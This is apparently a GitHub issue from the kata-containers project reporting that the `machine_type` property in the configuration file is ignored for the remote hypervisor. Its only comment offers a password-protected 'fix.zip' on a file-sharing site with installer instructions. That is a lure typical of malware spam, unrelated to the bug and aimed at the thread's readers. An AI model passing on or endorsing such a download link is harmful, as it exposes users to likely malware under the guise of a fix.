### ISSUE TITLE
runtime: `machine_type` property ignored in kata configuration file.

### ISSUE THREAD

**Issue by squarti** [kata-containers/kata-containers#10211]
# Description of problem

When running the remote hypervisor, `machine_type` cannot be specified in kata configuration file.

# Expected result

If `machine_type` property is set in kata configuration file, it should be included in annotations to create VM request (see [code](https://github.com/kata-containers/kata-containers/blob/6b0272d6bfa50050c400fbed116330e77be306ff/src/runtime/virtcontainers/remote.go#L79)).

# Actual result

The `machine_type` property is ignored.

# Further information

Annotation can be specified in pod by setting `io.katacontainers.config.hypervisor.machine_type` annotation.

# Kata Containers survey

Please consider taking the survey to help us help you: https://openinfrafoundation.formstack.com/forms/kata_containers_user_survey

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
